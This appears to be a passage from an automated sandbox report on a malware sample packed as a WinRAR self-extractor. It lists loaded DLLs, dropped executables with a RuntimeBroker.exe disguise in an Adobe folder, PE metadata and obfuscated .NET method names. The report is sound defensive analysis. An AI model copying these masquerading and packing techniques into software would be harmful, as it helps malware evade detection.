                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: uxtheme.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: windows.storage.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: wldp.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: profapi.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: cryptsp.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: rsaenh.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: cryptbase.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: mscoree.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: apphelp.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: version.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: wldp.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: profapi.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: sspicli.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: mscoree.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: version.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: wldp.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: profapi.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: mscoree.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: kernel.appcore.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: version.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: uxtheme.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: windows.storage.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: wldp.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: profapi.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: cryptsp.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: rsaenh.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: cryptbase.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: sspicli.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: ktmw32.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: rasapi32.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: rasman.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: rtutils.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: mswsock.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: winhttp.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: iphlpapi.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: dhcpcsvc.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: dnsapi.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: winnsi.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: rasadhlp.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: fwpuclnt.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: wbemcomn.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: amsi.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: userenv.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: winmm.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: winmmbase.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exeSection loaded: mmdevapi.dll
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exeJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\9e8d7a4ca61bd9Jump to behavior
                                Source: QH67JSdZWl.exeStatic PE information: Image base 0x140000000 > 0x60000000
                                Source: QH67JSdZWl.exeStatic file information: File size 1898695 > 1048576
                                Source: QH67JSdZWl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: QH67JSdZWl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: QH67JSdZWl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: QH67JSdZWl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: QH67JSdZWl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: QH67JSdZWl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: QH67JSdZWl.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                Source: QH67JSdZWl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: QH67JSdZWl.exe, 00000000.00000003.1663870017.0000025FF5C0E000.00000004.00000020.00020000.00000000.sdmp, f5Mb10zb.exe, 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp, f5Mb10zb.exe, 00000001.00000000.1667497208.0000000000753000.00000002.00000001.01000000.00000009.sdmp, f5Mb10zb.exe, 00000001.00000003.1669628043.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, f5Mb10zb.exe, 00000001.00000003.1668966554.00000000065A2000.00000004.00000020.00020000.00000000.sdmp, f5Mb10zb.exe.0.dr
                                Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: QH67JSdZWl.exe, 00000000.00000003.1663870017.0000025FF5C0E000.00000004.00000020.00020000.00000000.sdmp, mf04Loader.dll.0.dr
                                Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: QH67JSdZWl.exe, 00000000.00000003.1663870017.0000025FF5C0E000.00000004.00000020.00020000.00000000.sdmp, mf04Loader.dll.0.dr
                                Source: Binary string: D:\Projects\WinRAR\SFX\build\sfxrar64\Release\sfxrar.pdb source: QH67JSdZWl.exe
                                Source: QH67JSdZWl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: QH67JSdZWl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: QH67JSdZWl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: QH67JSdZWl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: QH67JSdZWl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                Data Obfuscation

                                barindex
                                .NET source code contains method to dynamically call methods (often used by packers)
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, muXnpA6lFel6HrDvFg0.cs.Net Code: Type.GetTypeFromHandle(GAZmbLkgNQF92A5Bfpe.j8Ga0AsS1QQ(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GAZmbLkgNQF92A5Bfpe.j8Ga0AsS1QQ(16777245)),Type.GetTypeFromHandle(GAZmbLkgNQF92A5Bfpe.j8Ga0AsS1QQ(16777259))})
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, muXnpA6lFel6HrDvFg0.cs.Net Code: Type.GetTypeFromHandle(GAZmbLkgNQF92A5Bfpe.j8Ga0AsS1QQ(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GAZmbLkgNQF92A5Bfpe.j8Ga0AsS1QQ(16777245)),Type.GetTypeFromHandle(GAZmbLkgNQF92A5Bfpe.j8Ga0AsS1QQ(16777259))})
                                Source: mf04Loader.dll.0.drStatic PE information: 0x98C03CC5 [Sat Mar 18 06:55:01 2051 UTC]
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6140703Jump to behavior
                                Source: QH67JSdZWl.exeStatic PE information: section name: .didat
                                Source: f5Mb10zb.exe.0.drStatic PE information: section name: .didat
                                Source: mf04Loader.dll.0.drStatic PE information: section name: fothk
                                Source: mf04Loader.dll.0.drStatic PE information: section name: _RDATA
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_0073F640 push ecx; ret 1_2_0073F653
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_0073EB78 push eax; ret 1_2_0073EB96
                                Source: C:\mshypercomponentSavesdll\agentFont.exeCode function: 5_2_00007FFD9B874B9E push esp; retf 5_2_00007FFD9B874BA3
                                Source: C:\mshypercomponentSavesdll\agentFont.exeCode function: 5_2_00007FFD9B874354 push ecx; ret 5_2_00007FFD9B87435C
                                Source: C:\mshypercomponentSavesdll\agentFont.exeCode function: 5_2_00007FFD9B8708E8 push FFFFFFE9h; ret 5_2_00007FFD9B870909
                                Source: C:\mshypercomponentSavesdll\agentFont.exeCode function: 5_2_00007FFD9B9D0078 pushad ; ret 5_2_00007FFD9B9D0079
                                Source: C:\mshypercomponentSavesdll\agentFont.exeCode function: 5_2_00007FFD9B9D30C6 push edx; ret 5_2_00007FFD9B9D30C7
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD9B76D2A5 pushad ; iretd 24_2_00007FFD9B76D2A6
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD9B952316 push 8B485F94h; iretd 24_2_00007FFD9B95231B
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FFD9B76D2A5 pushad ; iretd 25_2_00007FFD9B76D2A6
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FFD9B952316 push 8B485F94h; iretd 25_2_00007FFD9B95231B
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00007FFD9B78D2A5 pushad ; iretd 27_2_00007FFD9B78D2A6
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00007FFD9B972316 push 8B485F92h; iretd 27_2_00007FFD9B97231B
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD9B77D2A5 pushad ; iretd 29_2_00007FFD9B77D2A6
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD9B962316 push 8B485F93h; iretd 29_2_00007FFD9B96231B
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFD9B76D2A5 pushad ; iretd 31_2_00007FFD9B76D2A6
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFD9B952316 push 8B485F94h; iretd 31_2_00007FFD9B95231B
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFD9B79D2A5 pushad ; iretd 32_2_00007FFD9B79D2A6
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFD9B8B1FF2 push esp; iretd 32_2_00007FFD9B8B2033
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFD9B8B85FA push ebx; ret 32_2_00007FFD9B8B862A
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFD9B8B85D3 push ebx; ret 32_2_00007FFD9B8B862A
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFD9B8B1DC5 push esp; iretd 32_2_00007FFD9B8B2033
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFD9B982316 push 8B485F91h; iretd 32_2_00007FFD9B98231B
                                Source: C:\mshypercomponentSavesdll\agentFont.exeCode function: 38_2_00007FFD9B8C6235 pushad ; retf 38_2_00007FFD9B8C623D
                                Source: C:\mshypercomponentSavesdll\agentFont.exeCode function: 38_2_00007FFD9B8A4B9E push esp; retf 38_2_00007FFD9B8A4BA3
                                Source: C:\mshypercomponentSavesdll\agentFont.exeCode function: 38_2_00007FFD9B8A4354 push ecx; ret 38_2_00007FFD9B8A435C
                                Source: C:\mshypercomponentSavesdll\agentFont.exeCode function: 38_2_00007FFD9B8A08E8 push FFFFFFE9h; ret 38_2_00007FFD9B8A0909
                                Source: C:\mshypercomponentSavesdll\agentFont.exeCode function: 39_2_00007FFD9B884B9E push esp; retf 39_2_00007FFD9B884BA3
                                Source: C:\mshypercomponentSavesdll\agentFont.exeCode function: 39_2_00007FFD9B884354 push ecx; ret 39_2_00007FFD9B88435C
                                Source: C:\mshypercomponentSavesdll\agentFont.exeCode function: 39_2_00007FFD9B8808E8 push FFFFFFE9h; ret 39_2_00007FFD9B880909
                                Source: C:\mshypercomponentSavesdll\agentFont.exeCode function: 39_2_00007FFD9B8A6235 pushad ; retf 39_2_00007FFD9B8A623D
                                Source: agentFont.exe.1.drStatic PE information: section name: .text entropy: 7.474275009334667
                                Source: DONEBnCAFZiOynZWpVVmZLvNQeA.exe.5.drStatic PE information: section name: .text entropy: 7.474275009334667
                                Source: RuntimeBroker.exe.5.drStatic PE information: section name: .text entropy: 7.474275009334667
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, U4N86PmVelt9SpclLhc.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'qH9mNmOYdvL', 'gpxmymY15FW', 'cREgmTmtmcO7VmF6k4NO', 'NRhjTGmtaoS4rxWgsdPh', 'FZ69CCmtFawbc9vnArX5', 'Lmf9Zpmty4d4TB58twxa'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, MlVihGqFST1nAcEsUuC.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'Pieq09iZyh', 'Write', 'IoSqZoBSqW', 'T81qpq9vjV', 'Flush', 'vl7'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, KXJGFQnJ0onInRtHpWu.csHigh entropy of concatenated method names: 'Rrr', 'y1x', 'Bs0mNvyyGrs', 'RyLmNwByk1m', 'iLO5U9mhVK9h0wiugXmQ', 'DsKrWFmhzn65HaA2NeMk', 'qmBa0Km9ox58T4mZvZjt', 'F7XYsgm9mcWlw4WBXmPa', 'Nc7qATm9aafUEaM7tJY3', 'Rj49xDm9FNiEuTWoDDql'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, hf4IQNMBLCi30ntbGjA.csHigh entropy of concatenated method names: 'G2YMs4f5Zh', 'dcZMrF8smS', 'LqsMbMdrrx', 'NZnMRa3X3n', 'EERMd8kaFh', 'DlB3ZnmbBMlgbNgy0rAW', 'mgaTnjmbisTheqTxCKyr', 'JH0obFmbsk3DtTOGLREw', 'SMxocHmb9DsDqhZd6FCi', 'caJaR9mbxCoueAVQOZAe'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, ec0tumaKXXhrx8qodaf.csHigh entropy of concatenated method names: 'PiuahQ9JvE', 'R1Qa9uZWc9', 'qJwpNCmthdOxjjpx76EK', 'uYlZD3mtAGgtCsAlsAvP', 'qiHwtrmt8J2GEX8O1AgV', 'puhr0Gmt9ERQvZouwgAS', 'QkRasjDCAi', 'm7KxwUmtsr2T1ptbswKe', 'ARubsYmtr3cZrT9e46vs', 'Dt5fZ2mtB24y89i4ycDc'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, ULTSfcmgEyu7BA5nxAM.csHigh entropy of concatenated method names: 'LHumHxvpY2', 'DsZmYytOuu', 'L1cmlpmddf', 'QrVw9Ymqv7s8ip8iLnS1', 'tjaK1nmqTMvkHjBp3hFA', 't6kjwYmqnlWb6RPacysc', 'sICDTAmqwOFQqkTOgHS3', 'Mm25Numq2XoXcmJmFk2B', 'yY0sYkmqI8OkZsE9PNG6'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, JUb8M3kE5TQsvVOZ4Um.csHigh entropy of concatenated method names: 'WWIkGBkTFV', 'R2QkMmde63', 'oTrkK3BlIl', 'CPakeB1VHH', 'asMkcQoq66', 'XfhkPGkRpx', 'X1VkSu2Zsc', 'MQ5kjCjD1A', 'SXFk4qSKSC', 'xQLkLDbajw'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, LtUYn9NYlPAAPt0m6iv.csHigh entropy of concatenated method names: 'RJTNT8oDUS', 'Hsm7EHmPBYrjZFfdIYbT', 'nhxbnsmPirhnZUs7Zijg', 'KmT9yxmPs33qCW9woI7D', 'T72NEPQ8i7', 'SufcbJmPhOHUv5hIg1E6', 'niXVeXmP9ypSnKaZNcgL', 'tD9h5ZmPAJoe3jsRdpBf', 'lIilU1mP8wV9sQbnHd3i'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, AiLMyGGKkswp3G5F2Ns.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, P2Do2iG8YkD0s7oBLbB.csHigh entropy of concatenated method names: 'tAXG9Wy76h', 'rL3GxEMrT2', 'dCqGBrl0UA', 'cH9Gi3Vab0', 'ShMGsYQEmE', 'PARGrBaLyG', 'IZVGbMPaCU', 'dMHGRcmevy', 'mgeGdr45Cf', 'FQaGDXuqFN'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, NyHd405K4MvEe9T5Egm.csHigh entropy of concatenated method names: 'wvB5ckO9Ty', 'DLv5PMsyIx', 'T6w5StrJDf', 'WOr5j3oy0E', 'Dispose', 'aecYO2mCIeKUT6HUGA5i', 'ULfeXbmCwmAAD9ij8d1R', 'sPDylVmC2kTaSlBsKvwx', 'eZBHmOmCU5WThLlDCd5L', 'VLybgYmC3Kg8fw04rM1m'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, VKXPc0Tgwq6aE6YGU83.csHigh entropy of concatenated method names: 'REgTTH6Wte', 'X5mdq7m85iTDyO47DCOo', 'ItCw8Bm86IMwD9vQJWYD', 'h5tNPnm8Cuc7Kbpp3Hp3', 'zt13vom8kxcx3480QLav', 'soaTHtRIX7', 'nuKgnUm8bjTmlMVWBeCV', 'umnRS4m8s9GvZxdauTsF', 'jJjXODm8rBgvutxM0wrW', 'tlIxnam8RvkwyZEy1MqN'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, g9aCDC5WobKqLcofMGG.csHigh entropy of concatenated method names: 'iRm5H5Wtot', 'EcH51n2ONy', 'BWP5vfFfH1', 'MX05wGy7e3', 'TZY52RmMXY', 'GOu5IUZlaT', 'k5T5UZbOd5', 'My1535ya23', 'Dispose', 'buZmfwmCYhpo6v797Pkg'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, wmMxGRFRdBbhZWaokpO.csHigh entropy of concatenated method names: 'mX0yFiEoo7', 'UTUyyqZUbC', 'eDpy0dUOwl', 'C9QftXmMXhaTXMK5txFv', 'bB8w4OmMJRKpuHIX2fYx', 'Fu2q9nmMNLtN9uyNhoyE', 'uO7XJimMOZkJKJDpUUDY', 'rQWyJjM9dM', 'zO7qZJmMW7XBdtkxgM9H', 'iRVZI4mMglcD7PN1IUG2'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, TMISbINv5kpCJOH6S09.csHigh entropy of concatenated method names: 'VKhN2IfLqY', 'yHtLVpmPd7s8osZQHRUA', 'QpKYNHmPDwLwmdUL9ACB', 'QkfTtFmPfn6aa1KBNoAw', 'lSnQAImP7pth6KQwlNOc', 'mO1d0KmP5YHBEsjxSMff', 'wZao3SmPbpmx3iLyC36W', 'ekCVQZmPRgTrOfY9aaLn', 'zq9b0WmP60266Qwt1yyr'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, LrqnvPphML3I1uZSRRD.csHigh entropy of concatenated method names: 'kF7p5rjsrD', 'EnAp6PInTS', 'KNvPajmPlK84Uy43f7wV', 'Jl8H92mPHvvGZ9r4LvC9', 'OASbbHmPYEQLq9C9Gn8N', 'mEktermPEW7qWybdNGg7', 'N82pxwCl4k', 'vV7pB7vuSn', 'EA2pi8nicD', 'Ry6psibkR4'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, zdLEYycSqSs20sh3J9u.csHigh entropy of concatenated method names: 'Close', 'qL6', 'vWac4cAZ4l', 'ClKcLis3Kl', 'u21cATGtIY', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, WDZPbnTbaF1a3517ZQw.csHigh entropy of concatenated method names: 'csLmNYlBCtv', 'm7pTdqUu0R', 'gZjmNlwHslO', 'z7AEA2mhtHik9O0UWj9Y', 'cqwqD5mhGAlU3iN2UAXO', 'hXLyfYmh3rcGngIpw8hJ', 'udsqJkmhqEJZSCiaLQvY', 'Ugml9PmhM1Jo7FeXUwxZ', 'n05oOBmhKODS0poMDBEJ', 'gFd0wFmheV87GZ2hQRJf'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, OomxlwNqtbu61lvjvkH.csHigh entropy of concatenated method names: 'oALNGa6qsy', 'LB6NMV149i', 'KEPNK7inRi', 'wu3NeZxDVn', 'oArNcNeVwm', 'e9lNPedTvi', 'ncyomJmSa3SXZdhiTTso', 'dOSIComSFR0jFfNwBnVA', 'WdFWJ9mSyRjmAwu6XvoQ', 'NS1g0SmS0LKuAMykWGTk'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, aGOHMSnHemLOiyLxSQj.csHigh entropy of concatenated method names: 'x9wbVIm9nOHOrUOwHf1E', 'FJai6Mm9vmln5XTgqJxh', 'gxfR4Dm9w742Rd61k0py', 'LmEn4lm918CmwO9nhA1c', 'WMjWGpm9TKAjxLc2KXXW', 'method_0', 'method_1', 'jXBnlnHeNU', 'zk9nEQPb7n', 'AhSn17WRGO'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, w0DtNati4tM0E6uvEP2.csHigh entropy of concatenated method names: 'RqGtrHLgLu', 'MphtbRh3eA', 'G38tRRTX8N', 'VBkNMrmsjk2ZoJgK8d74', 'QXZTiJmsPGSdbUGfBnL6', 'rfNKhomsSEMhSZYsBgsX', 'ot1fmXms4ADtGs6nUCaQ', 'lFv8wKmsLdfTbADi77q2', 'xmP5u4msARf8jy6uBG8h', 'dpLowDms8tjPQKZ2fCXv'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, NgJJ0b3KU1esQKRMrBO.csHigh entropy of concatenated method names: 'method_0', 'FC93cAWNTc', 'IUP3PDfNYD', 'vi23SMrC1O', 'FbJ3jGALUf', 'F9c34Nx9t6', 'zGF3LdX2KH', 'vqisNfmi1k5Pp73BHBfn', 'OY2L9QmiTllnSI6p6dkf', 'BDfk5Amin2whftMfsm4L'
